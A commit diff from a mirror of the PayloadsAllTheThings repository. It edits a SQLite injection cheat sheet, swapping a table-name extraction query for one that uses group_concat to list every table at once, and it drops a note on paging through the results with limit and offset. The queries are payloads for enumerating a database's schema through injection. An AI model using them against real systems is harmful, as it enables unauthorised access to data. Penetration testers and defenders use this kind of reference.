mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2025-12-15 21:34:25 +01:00
commit
3de6c41823
1 changed files with 1 additions and 3 deletions
|
|
@ -37,11 +37,9 @@ SELECT sql FROM sqlite_schema
|
|||
## Integer/String based - Extract table name
|
||||
|
||||
```sql
|
||||
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
|
||||
```
|
||||
|
||||
Use limit X+1 offset X, to extract all tables.
|
||||
|
||||
## Integer/String based - Extract column name
|
||||
|
||||
```sql
|
||||
|
|
|
|||
Loading…
Reference in a new issue